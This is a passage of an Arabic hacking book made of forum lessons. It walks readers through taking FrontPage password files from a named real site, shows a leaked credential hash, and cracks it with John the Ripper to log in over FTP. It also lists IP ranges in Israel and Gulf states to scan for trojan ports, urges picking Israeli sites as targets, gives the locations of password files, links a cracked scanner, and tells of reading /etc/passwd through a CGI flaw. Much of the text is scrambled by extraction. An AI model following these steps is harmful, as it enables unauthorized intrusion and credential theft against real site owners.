التي يدعم سيرفراتها الـNT & Unixطبعا ثغرات الفرونت بيج بتكون موجودة في أنظمة التشغيل FrontPage(: وبتمكنك من معرفة كلمة سر الدمين تبع الموقع ,

وكلمات السر هذه بتكون موجودة في الملفات التالية:Administrator.pwd

Administrators.pwdAuthors.pwd

Users.pwdvti_pvtالتي بتكون عادة في المجلد _

:)http://www.tradesystemlab.com/_vti_pvt/service.pwdمثل هذه الملف مثل: هتلقي مكتوب بداخله هكذا تقريبا:service.pwdوبعد فتح الملف

- #FrontPage-tradesys:FpNTpIDWSk872

وهذه كلمة السر المشفرة واسم المستخدم :)

S: أووووه واااااو ممتاز , ولكن كيف أدخل على الموقع كأدمين بهذه الكلمات ؟؟ :3س في عنوان الموقع كلمةwww , أو ضع بدل WS_FTPج: يمكنك استخدام برنامج اف تي بي مثل برنامج

ftp :مثل هذا ftp.ebnmasr.comوقم بموضعه في شريط العنوان , وسيطلب منك الموقع اسم المستخدم وكلمة المرور للموقع :)

: مشكور حبيبي ولكن ليش مايدخل باسم المستخدم وكلمة السر هذه :4سtradesys:FpNTpIDWSk872) ؟؟ N(

John The: بكل بساطه لنها مشفرة !! , يمكنك فك تشفيرها عن طريق برنامج مثل برنامج 4جRipper :نزله من هنا , http://www.openwall.com/john

: أها , لكني ماأعرف أستخدم هذا البرنامج , ممكن تشرحهولي أخي العزيز القناص لو سمحت ؟؟5س : لتستأذن مني ياولد !! , أنا في الخدمة :) , شوف: انت أول ماتنزل البرنامج وتفك ضغطه , هيكون فيه5ج

, شوف: عشان تسهل على نفسك وبدل ماتفتح الدوسrun , الي يهمنا هو مجلد doc & runمجلدين: :pوتدخل على مجلد البرنامج وهالمشاكل وكمان البعض ما بيعرف يعمل هالشياء :

, أوكى ؟؟run وقم بنسخه والصقه في مجلد command.comابحث في جهازك عن:

178

Page 179: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

مثلpasswd باسم txt وحطها في ملف tradesys:FpNTpIDWSk872وجيب كلمة السر هذه: واكتب فيه الوامر التالية:command.com , افتح john.exe , ول تقم بفتح runوضعه في مجلد

john -single passwd.txtليبحث لك عن الكلمات السرية التي تكون مطابقه لسم المستخدم << john -i:Digits passwd.txtليبحث لك عن الرقام فقط << john -i:Alpha passwd.txtليبحث لك عن الحروف الصغيرة <<

john -i:all passwd.txt, ليبحث لك عن جميع الحتمالت , ( وأنا على طول أستخدم هذا المر << )Dعشان كده بتطول عملية الفك معي :

john.potوبعدما ينتهي البرنامج من فك الكلمة ستجد كلمة السر المشفرة والمفكوكه بالملف هذا:

: يااااااه , البرنامج طول كثير , متأكد أنه هيفك تشفيرها ؟؟6س: أيوووووه لزم يفك تشفيرها في النهاية , حتى لو أخذ أسبوع ;) , لنه بيجرب جميع الحتمالت.6ج

وممكن تعرف حالة البرنامج بالضغط على أي زر من لوحة المفاتيح :)

) , لكن وين اسم المستخدم ؟؟Y: الحمد ل , خلص انفكت كلمة السر (7س tradesys , هيكون اسم المستخدم: tradesys:FpNTpIDWSk872: في كلمة السر هذه: 7ج

( يعني الكلمة الي بتكون قبل علمة : )

: قنااااااص , ممكن تقولي كيف جبت هالثغرة من الموقع ؟؟ :$8س : هههههههههه ,,, وليه هالوجه الخجلن ;) , أنا بصراحة جبتها بالبحث العشوائي , ولكن انت لو كان8ج

) عشان تطلعDعنك موقع ممكن تعمل عليه سكان ببرنامج فحص مثل برنامج عمران ( المفضل لدي :الثغرات الموجودة بالموقع :)

: طيب أنا عندي سؤالين عالجواب الي فات ده , هأسأل واحد الول :) , ايه طريقة البحث العشوائي هذه9س؟؟

عشان تلقيspidersج: أحم أحم , هذه الطريقة : انك تبحث عن ثغرة معينة في محرك بحث يستخدم الـ مواقع كثيييرة فيها الثغرة هذه , في طبعا مواقع كثيرة بتستخدم السبايدرز , لكن لن أقولك لك على أي واحدة

وطبعا هذا موقع اسرائيلي , عشان معظم النتائج تكون مواقعwalla.co.ilمنها , ال هذا الموقع: اسرائيلية ;) .

: ممممم , كيف يعني تبحث عن ثغرة معينه ؟؟ , مافهمتك زين !!10س : أنا وال ماأستخدم هالمواقع ال للبحث عن ثغرات الفرونت بيج :$ , يعني انت مثل عايز تبحث عن10ج

:) :) :)service.pwdالثغرة التي تم ذكرها سابقا , هتكتب ايه ؟؟ , مانت كاتب غير كلمة واحدة , هذه:

: أهاااااا , مشكور حبيبي , كنت عايز أسألك كمان عن كيفية عمل برامج السكان على الثغرات :)11س , وبتبدأ تجرب ثغرةEXPLOITES: البرامج هذه بتكون فيها مجموعة كبيرة من الثغرات أو الـ 11ج

, هذاEXPLOITESثغرة على الموقع , وتطلعلك النتائج :) , وفي موقع رهيييب عشان تجيب منه الـ ./http://www.ussrback.comهو:

انتهى،،،

179

Page 180: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

للبحث عن الثغرات "CgiScaner" برنامج

<ةةةةة><ةةةةةة: ةة ةةةة>

هنا برنامج رائع للبحث عن الثغرات

خروج.1رقم أظهار الكودات المستخدمة.2رقم بدأ البحث.3رقم تضع العنوان للضحية.4رقم

وأترك البرنامج وسوف يظهر لك الثغرات الموجودة فى الموقع.

وصلة البرنامج..http://mypage.ayna.com/vox99/cgiscan3.zip

انتهى،،،

180

Page 181: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

" شرح برنامج سوبر سكان لمعرفة المنافذ المفتوحة فيالمواقع "

<ةةةةة ةة ةةةةةةة ةةةة ةة><ةةةةةة: ةةةةةة>

تعريف بالبرنامج ::: هذا البرنامج يقوم بالبحث عن المنافذ المفتوحه في جهاز

الضحيه ,,, لن بعض البرامج يكون فيها الباحث ضعيف ول يصيد

اي اي بي به منفذ مفتوح ومن امثلة ذلك برنامج السب سفن جولد ,, رغم ان

البرنامج وقوة اتصاله ممتازه ال ان الباحث ضعيف فنستخدم هذا البرنامج كاداة

مساعده ’’’’’ ول اطيل عليكم بالكلم اليكم الشرح

انا شرحت البرنامج رغم سهولته وفوق ذلك معرب

ولكن البعض ليعرف استخدامه ... اليكم واجهة البرنامج

181

Page 182: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

ثلث خطوات تقوم بها وهي كالتالي ::

انظر اعلى اليمين تجد قائمة المنافذ ادخل قائمة المنافذ لتحديد المنفذ

.1243 او 27374المراد البحث فيه مثل السب سفن المنفذ الخاص به

انظر الصوره التاليه ؟

في رقم واحد نكتب المنفذ الذي نريد البحث فيه

رقم اثنين لكي نضيف المنفذ **ملحظه نقدر نضيف اكثر من منفذ

بعد ماننتهي من اضافة المنفذ نضغط اوكي للتأكيد ونتأكد من ان المنفذ قد

اضفناه كما في الصوره .

بعد ذلك نرجع للصوره الولى ونضبط الخيارات كما هو موضح

ونحدد الي بي من ------------ الى

بعد ذلك نضغط ابــــــــــــدأ فتظهر لنا الي بيات والي بي الذي به منفذ مفتوح

نحصل علمة + على يساره عندما نضغط عليه يظهر لنا المنفذ المفتوح

كما في الصوره الولى ........انتهى و,,,,

182

Page 183: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

وصلة البرنامج...http://mypage.ayna.com/a7lla1/superscan.zip

خذوا هذه اليبات وبحثوا فيها شدوا حيلكم في اليبيات الولى

-------->أسرائيل212.150.32.255---------------212.150.13.1---------->أسرائيل62.0.180.255-----------------62.0.150.1

-------->أسرائيل199.203.72.255---------------199.203.75.1-------->أسرائيل139.92.208.255---------------139.92.208.1-------->أسرائيل192.114.42.255---------------192.114.42.1--------->أسرائيل216.72.43.255----------------216.72.43.1

------->أسرائيل212.143.113.255--------------212.143.113.1-------->أسرائيل209.88.198.255---------------209.88.198.1-------->أسرائيل212.29.238.255---------------212.29.238.1

------->أسرائيل193.128.102.255--------------193.128.102.1------->أسرائيل192.117.236.255--------------192.117.236.1

--------->أسرائيل213.8.204.255----------------213.8.204.1-------->أسرائيل212.25.120.255---------------212.25.120.1--------->أسرائيل128.139.1.255----------------128.139.1.1

------------> السعوديه212.2.227.255------------->212.2.224.1-----------> السعوديه212.26.255.225-------------->212.26.1.1

-----------> السعوديه213.238.20.255------------->213.238.0.1------------> السعوديه212.102.3.255------------->212.102.1.1

----------> السعوديه212.116.195.255----------->212.116.190.1-----------> السعوديه212.106.70.255------------>212.106.60.1

-----------> المارات195.229.31.255------------->195.229.6.1----------> المارات195.229.255.255----------->195.229.224.1----------->المارات194.170.30.255------------>194.170.30.1

----------->المارات213.42.255.255-------------->213.42.1.1

-------------> الكويت208.7.80.255-------------->208.7.70.1---------->الكويت195.226.255.255----------->195.226.240.1----------->الكويت195.39.145.255------------>195.39.130.1---------->الكويت168.187.255.255------------->168.187.1.1

-----------> قطر194.133.255.25------------->194.133.1.1------------> قطر209.58.40.255------------->209.58.40.1

-----------> قطر206.82.133.255------------>206.82.133.1

-----------> عمان206.49.109.255------------>206.49.109.1-------------> عمان212.72.7.255-------------->212.72.1.1

----------> البحرين193.188.200.255------------>193.188.50.1

183

Page 184: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

انتهى،،،

لتحليل الموقع "Shadow Scan Security" شرح برنامج

<ةةةةة ةة ةةةةة ةةةةة><ةةةةةة ةةةةةة>

نبذة بسيطة عن البرنامج: هذا البرنامج هو أكثر البرامج فعالية في اكتشاف الثغرات وأيضا المنافذ المفتوحة ف المواقع ولديه أعمال

كثيرة لكني لن أتطرق إل لعملية واحدة فقط وهي شرح كيفية اكتشاف الثغرات في المواقع ومعرفة النطاقات المستخدمة لهذا الموقع وبالنسبة للخيارات الباقية لن أشرحها لنها سوف تأخذ وقت طويل لكني سوف أقسم

شرحي لهذا البرنامج لقسام عدة وسوف أبدئها بالعظم وهو شرح لكيفية إخراج ثغرات الموقع والمنافذالخاصة به والمواقع المسجل بها والمزيد من الوظائف

Shadow Scan Securityأول تنزيل البرنامج وتنصيب الكراك

مافيه أبسط منه

حمل البرنامج من هذي الوصلة

http://www.safety-lab.com/SSS.exe

وبعد مايكتمل التحميل حمل الكراك من هنا

http://www.e3sar.net/almodammer/ShadowSecurityScanner5.35.exe

الطريقة:========================================

له SetUpبعد تحميل البرنامج وتنزيله وعمل افتح الكراك

وبعد ذلك ستظهر هذه الصورة:

184

Page 185: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

+++++++++++][ اضغط ليتم تنفيذ الكراك1][][ بعد إتمام عملية الكراك اضغط هنا للخروج2][

========================================

*****& شـــ البرنامج ـــرح &*****

سوف أشرح باختصار ومن يصعب عليه الفهم أرجو أن يتقدم لي بالسؤال

=(بعد تحميل البرنامج قم بفتحه من قائمة Startابدأ

وابحث عنه ضمن البرامجبعد إيجاد البرنامج قم بفتح

ShadowScanSecurityليـأتي لك هذا)=

-1الشكل -

Scannerأثناء الضغط على

-2الشكل-

185

Page 186: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

ولكن تحمل اسمك (ولداعي لن تنشأ4= إضافة سياسة جديدة والمقصود بها أيقونة أخرى وهي الرقم 1باحث أو سياسة جديدة لك يكفيك الموجودة)

= إعدادات لهذا الباحث وأيضا انا لأنصحك بتغيير شيء أبدا في هذا الخيار 2 ولكن من تصميمك فبضغطك4= حذف الموجه الجديد التي انت صممته والمقصود اليقونة التي تشبه رقم 3

هنا سوف تحذفها= عليك تظليله وهو المربع الذي يوجد به خصائص البحث عن كل شيء4= لرجوع للخلف ولأظن أن هناك رجوع لنها العملية والطار الول5= اضغطها إذا أردت المتابعة6= إزالة الطار7

-3الشكل-

186

Page 187: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

-2) للرجوع إلى الشكل -1 () الذهاب إلى العملية التالية2 () إلغاء إكمال العملية3 (

-4الشكل-

+ إضافة موقع للبحث فيه1++ إضافة أي بي من وإلى2+ + تحميل من ملف سواء كان يحتوي على مواقع تريد البحث عنها او آي بيات3++ عند إضافة موقع وبعد تحديده أثناء الضغط هنا سوف ينحذف4+-3 + العودة والرجوع إلى الخلف أي: الشكل-5+ + إتمام العملية6+ + إزالة والخروج من الطار إلى واجه البرنامج الرئيسية كباقي الزرار السابقة في الشكال السابقة7+

-5الشكل-

وفي الخطوة السابقة سوف يظهر هذا المربع الكبيرDoneأثناء ضغط الزر ومن هنا سوف نبدأ البحث عن الثغرات أنظر الشكل لتفصيل أكثر

187

Page 188: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

-6الشكل-

وذلك بتظليل الموقع والضغظ بزر الفأرة اليمينStart Scanبعد الضغط على

-5 في الشكل-1انتظر قليل بعد ضغطك لرقم

وسوف يقوم البرنامج بالبحث في الموقع والمنافذ الخاصة به مع النطاقات كما هو موضح في هذا الشكل

انتهى،،،

" اماكن وجود ملف الباسورد في أنظمة التشغيل "

<ةةةةة ةة ةةةةة ةةةةة><ةةةةةة: ةةةة ةةةة>

في نطم ليونكس /etc/shadow

188

Page 189: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

في نظم صن ميكروسيستيمز /etc/shadow

بصفه عامه BSDفي نظم ال/etc/master.passwd

ARIX المسمى SGIفي نظم السيليكون جرافيكس /etc/shadow

AIXنظام اي بي ام المسمى /etc/security/shadow

64 (( خاص بالمنفريم ونظم الريسك 64نظم يونكس بصفه عامه ((اتش بي يو اكس - (( ترو يونكس وبعض منتجات اللفا )) )) ))

/etc/shadow

القوي )) MD5((اغلب هذه الصدارات تعتمد تشفير

)) NT - XP - 2000نظم ويندوز بصفه عامه (( )) LanMan(( الملف المفعل بتشفير

/winnt/system32/config/sam ((هذا الملف مغلق عادة ال عند القلع من النظام ول يسمح بفتحه او نسخه طالما النظام يعمل حتى ولو كان

لديك صلحيات الدمنيستريتور ))

((الملف الحتياطي )) /winnt/repair/sam or sam _.

في الويندوز اكس بي البروفيشينال واصدارات الويسلر (( سيرفر - ادفانسد سيرفر )) WINNTلن تجد الويندوز في مجلد

.Windowsولكن سيكون كالويندوز العادي

انتهى،،،

" اختراق الموقع (الجزء الول) "

<ةةةةة ةة ةةةة ةةةةةة ةةةةةةةةةة>

189

Page 190: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

مقدمه :

مرت فترة طويلة منذ الدرس السابق ول اعرف لماذا مر كل هذا الوقت دون أن ابدأ في كتابة هذا الدرس .. ربما لصعوبة الموضوع و تشعبه .. و لكن ها قد حان الوقت لمجابهة الصعوبة و التشعب و تقديم و لو حتى

فكرة بسيطة عن هذا الموضوع الممتع ..

من جديد و لكن بطريقه اكثر بساطه .. Telnetسأعيد تعريف Telnetهو برنامج يستخدم في إنشاء وصله بين جهازين ،و الجهاز المتصل يستخدم عنوان الجهاز

الذي سيتم التصال عليه ،و الجهاز المستهدف (الخادم) يشغل برنامج آخر (Portالمستهدف و رقم المنفذ Daemon . يستمع على هذا المنفذ و تتم عمليه الرسال والستقبال باستخدام أحد البروتوكولت (

تشبيه من حياتنا العملية : نفترض أن هناك رجل في فرنسا (المستهدف) و أنت (المتصل) تريد إقامة حوار ) و لنفرض أنها الهاتف الذيTelnetمعه (وصله) و أنت في مصر .. فلبد لك من استخدام وسيله اتصال (

) لكي يسمعك .. و لنفرض أيضا أن هذا الرجل ل يتحدث العربيةDaemonلبد للرجل أن يضعه على أذنه (.. إذن فلبد لك من استخدام الفرنسية (البروتوكول المستخدم) حتى تتحدث (الرسال والستقبال) بحريه .

هو مجرد وصله (مثل الهاتف) .. و انه لبد لنا من معرفة البروتوكولTelnetمما سبق نستنتج أن المستخدم في التصال حتى ننجح في الرسال و الستقبال . كما انه لبد لنا من أن نعرف أيضا أنه لبد من

يتسمع على المنفذ المراد التصال عليه . Daemonبرنامج

FTP Client ك Telnetاستخدام FileTransfer Protocolالمنفذ الذي سيتم التصال عليه في حاله استخدامنا بروتوكول نقل الملفات

.. 21في الغالب سيكون

أين الصعوبة إذن ؟ يجب علينا اللمام بقدر كبير ببروتوكولFTP Client ك Telnetالصعوبة تكمن في أننا لكي نستخدم

FTP !! و لكن هذا لن يمنعني من عرض بعض المثلة لظهار كيفية التعامل مع هذا البروتوكول ..

بدء التصال 21 بالمنفذ ftp.zdnet.com و شبك على Telnet- قم بتشغيل 1

و هذا ما سيظهر لك

Sources Code شفرة -

220 l19-sj-zdnet.zdnet.com NcFTPd Server (licensed copy) ready .

و هيzdnet المستخدم في موقع FTP Daemon الخاص بال Bannerو السطر السابق يسمي تختلف باختلف الموقع الذي سيتم التشبيك عليه . و الرقم الموجود في البداية يدل على نجاح التصال و هو

رقم ثابت . .. بما أنPassword و كلمة السر Username- الخطوة التالية هي الولوج باستخدام اسم المستخدم 2

zdnet تدعم المستخدم Anonymous :سيتم استخدامه في الولوج للنظام كالتالي ستكتب

Sources Code شفرة -

190

Page 191: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

user anonymous

و سيستجيب الخادم بالتالي

Sources Code شفرة -

331 Guest login ok, send your complete e-mail address as password .

ثم تكتب أنت التالي

Sources Code شفرة -

pass @zorro

تقوم بإعطاء عنوان البريد اللكتروني الخاص بك ككلمةAnonymousو بالطبع عند الولوج بالمستخدم السر .. و إذا لم ترد إعطاء بريدك فيمكنك أن تكتب أي شئ يأخذ شكل البريد (أي يحتوي على الرمز( @

و سيستجيب الخادم بالتالي

Sources Code شفرة -

230-You are user #552 of 2000 simultaneous users allowed .230 -230 Logged in anonymously .

و بالطبع تلك الستجابه قد تختلف من موقع لخر .. إل في الرقم في بداية كل سطر .. أنت الن قد قمت بالولوج إلى الخادم بنجاح .

بعد أن تمت عمليه الولوج للنظام يجب إنشاء وصله لرسال واستقبال البيانات (قائمه بالملفات الموجودة أو الملفات ذاتها) .. إذن ما الذي كنا نفعله منذ قليل ؟!! ما قد فعلناه منذ قليل هو إنشاء وصله لرسال الوامر

للنظام و استقبال استجابة النظام على الوامر . و لكي ننشئ تلك الوصلة ،هناك طريقتين

الخاص به و المنفذ المفتوح الذيIPالولي : تنشئ هذه الطريقة الوصلة بان يرسل الزبون (أنت) رقم يستطيع الخادم استخدامه في إرسال البيانات .

و لكن تلك الطريقة تتطلب منك فتح أحد المنافذ على جهازك و هذا سيتطلب برنامج خاص لفتح هذا المنفذ ..و لذلك لن نستخدم تلك الطريقة .

PASVالثانية : تنشئ هذه الطريقة الوصلة بان يرسل الزبون المر

191

Page 192: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

Sources Code شفرة -

PASV

الخاص به و المنفذ المفتوح (على الخادم بالطبع) الذي يستطيع الزبون (أنت)IPو سيرد الخادم برقم التصال عليه ..

مثال

Sources Code شفرة -

227 Entering Passive Mode (207,189,69,61,12,41 (

و الرقم الطويل الموجود بين القواس تفسيره كالتالي .. ..207,189,69,61 الخاص بالخادم و في هذه الحالة يكون IPأول أربع مجموعات (من اليسار) هو ال

أما الرقمان التاليان فيمثلن رقم المنفذ و يتم حسابه كالتالي 12 × 256 + 41 = 3113

..3113و لذلك فالخطوة التالية التي يجب على الزبون اتباعها هي فتح وصله جديده مع الخادم على المنفذ بالمنفذftp.zdnet.com جديده و تشبك على Telnetولكي تقوم بمثل هذا المر يتوجب عليك فتح نافذة

3113 .. إذن عندما تريد أن ترسل أحد الوامر سترسله من النافذة الولى و النافذة الثانية ستظهر بها البيانات ..

مثال )يستخدم لعرض محتويات الدليل) في النافذة الولى LISTعندما ترسل المر

Sources Code شفرة -

LIST

سيستجيب الخادم بالتالي في النافذة الولى أيضا

Sources Code شفرة -

125 Data connection already open; Transfer starting .

192

Page 193: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

و ستظهر محتويات الدليل في النافذة الثانية ثم سيتم غلق التصال في النافذة الثانية بمجرد إتمام عرضمحتويات الدليل .

و هكذا كلما أردت أن ترسل أمر عرض محتويات دليل ما أو استقبال أو إرسال ملف ما ، يجب أن تبدأ بأمرPASV . ثم تنشئ اتصال جديدا بعد حساب رقم المنفذ باتباع الخطوات السابقة ..

إلى هنا و أظن أنني قد تماديت .. و لكنني لم استطع أن امنع نفسي من مشاركتكم بهذا الموضوع الممتع(ممتع بالنسبة إلي) .

ملحظات هامة ؟!!CuteFTP - لربما تتساءل الن .. أل أستطيع بدل من كل هذا الهراء أن استخدم برنامج جاهز مثل

بالطبع تستطيع و لكن لن يضرك أن تعلم شيئا عن البروتوكول الذي تستخدمه و ربما بعد تعلم البروتوكولتستطيع أن تصنع برنامجك الخاص

- اقرأ الدرس مره و مرتين حتى تستوعب الفكرة تماما ثم اسأل فيما شئت - لتعلم اكثر عن هذا الموضوع قم بزيارة المواقع التالية

http://www.vbip.com/winsock/winsock_ftp_01.asp (ينصح به بشده)

http://www.vbip.com/winsock/winsock_ftp_ref_01.htm (ينصح به بشده) http://www.cis.ohio-state.edu/htbin/rfc/rfc0959.htmlلمن اراد التعمق في)

البروتوكول).

انتهى،،،

" اختراق المواقع (الجزء الثاني) "

< منقول من موقع الجهاد><الكاتب: الكندور>

193

Page 194: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

الختراق : ~~~~~~~~~

- المقدمة . - كيف أجمع معلومات حول الموقع ؟

- كيف يتم كشف نقاط الضعف ؟ - كيف يمكن إستغلل نقاط الضعف المكتشفه ؟

؟ password file- ماهو ملف كلمة المرور - بماذا يفيدني هذا الملف ؟

؟ password file- كيف يمكن معرفة كلمة السر من خلل ملف الباسورد ) ؟ shadowed) وإذا كان (مضلل encryption- ماالفرق بين إذا كان الملف (مشفر

- وماذا لو كان ملف كلمة المرور مشفر ، كيف يتم كسره ؟ - ولو كان ملف كلمة المرور مضلل ، ماذا علي ان أعمل ؟

المقدمة :- ~~~~~~~~~

أعد هذا المستند للباحثين وليس لمن أراد أن يخترق موقع فقط ! أنا أعتبر أن لديك الخبره اللزمه لفهم كل ما ) أو غيره وحط لك في هذا المستندVoid Eyeأتحدث عنه ، ل تتوقع إني بقول لك نزل برنامج ( مثل

شرح بالصور وقول لك إخترق مواقع ، العمل المقزز هذا لن نتطرق له أبدا

- كيف أجمع معلومات حول موقع ؟ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

المشهوره والقواء على الطلق،يمكن أنnmapأول خطوه تصلحها هي بورت سكان ، أنصحك تستخدم وهي تعمل على نظام ليونكس ،www.inscure.org/nmapتبحث عنها هذا إذا ما لقيتها في الموقع

، عليك البحث عنها في النترنت ، سوف تجدSuperScanإذا أردت برنامج يعمل على ويندوز انصحك بـ Perl لعمليه البحث ، لغه Perlآلف المواقع التي تقدمها لتنزيل ، ومن الممكن أن تستخدم نصوص

Cأصبحت اللغه محبوبه لدى جميع الهاكر بعد ) بعض برامج/http://www.7lem.comبعد الحصول على النتائج ، مثل نصلح تجربه على الموقع

لتعرف رقم الي بي) pingالبحث تطلب وضع رقم الي بي للموقع ، ولتقبل الدوماين عندها إستخدم ) ويوجد منافذ587 - 514 - 513 - 143 - 110 - 37 - 25 - 23 - 22 - 21تأتي النتائج ، البورتات (

أخرى لكن لن نهتم لها هنا ، نقوم بعمليه نزع التواقيع للمنافذ...

ماهي عمليه نزع التواقيع للمنافذ؟ من المعروف أن المنفذ فتح من قبل تطبيق ، عند التصال بهذا المنفذ فسوف يتم إرجاع رد اليك ، مثل لو

توجد به خدمه تلنت ، ويتضح هذا/http://www.7lem.com وهو لتلنت ، وموقع 23إتصلت بالبورت من عمليه مسح المنافذ ،التصال بخدمه اتلنت

telnet http://www.7lem.com/

194

Page 195: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

بنفس الصيغه ،QNX وFreeBSD و SunOS و Linux و Windowsيتم تنفيذ المر التالي في عنها ، وهو لن لينكس يوفر كل ماتحتاجه من أدوات ...هذا المستند ل يختص بـLinuxولكن أفضل

Linux لذلك لن أذكرها ، تأتي نتيجه التصال بسيرفر الحلم على بورت التلنت

----------------------SunOS 5.7

:login ----------------------

،بقي عليك أن تنتزع التواقيع من البورتات المتبقيهSunOS 5.7يتضح بأن السيرفر يعمل على نظام لتعرف ما هو التطبيق وإصدارته المنصت لها (إستخدم التلنت ) ، وثم تقوم ببحث عن نقاط ضعف لها

وتحصل على شيفرات الستثمار الخاصه بها ، الخطوه التاليه هي أن تعرف ما هو ملقم الويب الذي يعملعلى هذا النظام ، نذهب الى الترمينال تبع ليونكس ونكتب

nc http://www.7lem.com/ 80

---------------------- . . .

Apache/1.3.* Server . .

----------------------

أختصرت النتيجه وتم تضليل إصدار ملقم الويب وذلك لحمايه الموقع ، اتمنى أن تستطيع كشفه بنفسك... مفتوحين ، هذا يدل على أن في الموقع25 و 110من المعروف من عمليه السكان بورت بأن البورتين للموقع ، كل ماعليك فعله هو كتابه المرpop و smtpخدمة البريد اللكتروني ، بالطبع هذا يفيدك لمعرفه

) Linuxالتالي (في

host 7lem.com

وأنتظر النتائج

ملحظه :- إذا كنت تعيش مع بن لدن ولست عائش في جو تقنيه معلومات كل ما عليك فعله هو تفجيراليميل(على حسب ما يسمياها كثير من الناس)

ملحظه ثانيه :- إذا لم تجد في السيرفر خدمه تلنت أو أنه تم تغيير التوقيع عن طريق مثل قرصنه الداة المفضله لكشف نظام التشغيل ، وهي تعمل على ليونكس ،quesoالنظام ....الخ ، عليك أن تستخدم

لستخدامها عليك كتابه queso http://www.7elm.com/

والذي هو80 وثم مسافه والموقع ورقم البورت quesoكل ماعليك بعد تثبيت الداة في جهازك هو كتابه SunOS 5.7بطبيعه الحال مفتوح في جميع المواقع...يأتيك الرد بأن النظام

أوsupport مثل ( /http://www.condor.comلو أردت مثل قائمة بالبريدات الموجوده في موقع webmaster أو info الخ ) أو أدرت معرفه الـ... DNSالولي والثانوي للموقع ، أو من هو الشخص

، تستطيعwhoisاللي سجل ومعلومات عنه وما هي الشركه التي تستظيف الموقع ، عليك بإستخدام خدمه في لينكس ،whois عن طريق أمر whois وتطلب معلومات من قواعد بيانات whoisإستخدام خدمه

لمزيد من المعلومات ، إذا كنت تستخدم ويندوز أو أي بيئه أخرى أنصحك بالتوجه الىman whoisأكتب برمجيات السي جي آي المتواجد في الموقع

195

Page 196: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

http://www.psyon.org/tools/index.html توفر لك هذه الصفحه مجموعه من برمجيات السي جي آي التي تسهل لك المهمه ، هناك رياضيات لطلب

وهي مفيده جدا ، على كل حال توجه الى الموقع التالي لمزيدwhoisمعلومات عن موقع ويب بإستخدام من التفاصيل

http://www.google.com/search?q=whois&btnG=Google+Search

- كيف يتم كشف نقاط الضعف ؟ ~~~~~~~~~~~~~~~~~~~~~~~~~~

هذه للمغفلين فقط!!، المحترفينShadowSecurityScaner أو void eyeل تستخدم برامج مثل واللي يبغا يكون محترف ل يستخدم برامج في عمليات الختراق ، ول يخترق لمجرد أنه يبغا يخترق ، عمليه

إختراق سيرفر تمتاز بالدقه المتناهيه ، والتخطيط المحكم ، وكل عمليات السطو المحكمه هي التي يصعب إكتشاف مرتكبيها ، لكن وال لو كنت من اللي يشغل برنامج ومايدري ال وين حاطه فصدقني إنك ماراح تفلح

طول عمرك ، هذا لو قدرت تخترق شئ ، فلو حدث وتم الختراق بواحد من هذه البرامج فسوف تصطادبسناره تماما كالسمكه

نقاط الضعف المفضله والتي تعتبر كأسرار ول يكشف عنها ال بعد فتره طويله هي التي في ملقم الويب مثلApache أو IIS وكذلك نقاط الضعف الموجوده في سكربتات ، CGI و Perl و PHPأو التي قد ،

تكون موجوده في البرنامج المستخدم لتفسير نصوص البيرل أو السي جي آي ، وإذا كان في الموقع برنامج لتسوق مثل من الممكن أن تستغل فيه نقطه ضعف هذا إذا وجدت به ، يعني اي شئ في السيرفر سوى كان

سكربت بيرل أو سي جي آي..أو كان برنامج تنفيدي أو حتى نظام التشغيل أو ملقم الويب مصاب بنقطه ضعف من الممكن أن يعرض السيرفر للختراق ويعرض كل ما بداخله من أسرار الى المخترق ، سأختار لكم

حادثه مره معي ، عداد زورا counter عرض موقع

mp3 مشهور للختراق في أي لحظه ، أول مادخلت الموقع ونزلت أغنيه Don't Tell Meفي الوقت اللي كانت الغنيه تنزل فيه حبيت أشوف الموقع وأضيع وقت الى أن ينتهي التحميل ، ما كنت أتوقع أني

بلقي نقاط ضعف فيه ، فتحت التلنت الخ ، دخلت منتدى في الموقع واخذت إسم110 و21 و 23 و 25وشبكت على كم بورت معروف مثل

توجهة الى كم موقع وبحثت فيها بسرعه عن نقاط ضعف المنتدى ، ولكنIkonboard v2.1.8bالمنتدى ، تركنا المنتدى ورحناIkonboard v2.1.7b وليس Ikonboard v2.1.8bكانت نقاط الضعف لـ

، وجدنا سكريبت ثاني ، علبةpl و cgiندور على شئ ثاني ، فتحت السورس تبع الصفحه وبحثت عن توصيت ، نبحث عن نقاط ضعف لها ، ل شئ تماما ، نكمل البحث عن السكريبتات ، وأخيرا وعندما وصل

خاص لعداد الزوار ، تمكنك منcgi % كنت قد توصلت لنقطه ضعف في سكريبت 80التحميل للغنيه عند وطبعا كلمة المرور المسجله في المف كانتetc/passwdعرض أي ملف في السيرفر ، طلبت الملف

يعني كلمة المرور تكون في نفس الدليل ولكن في ملف ثاني وهوالملفFreeBSDمضلله والنظام كان هو shadowأو master.passwdلتشغل بالك الن بما تعنيه كلمة مضلله ومافائده هذا الملف ..كل ،

هذا ستعرفه قريبا ...إستمر في القراءة فقط++++++++++++++++++++++++

الجزء الثاني }http://www.fbunet.de/cgibin/nph-%20%20%20%20%20.cgi هذا { CGIل ،

تستغرب ، هذه هي الحركات الجديده لنشر ال نكمل الموضوع ....

196

Page 197: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

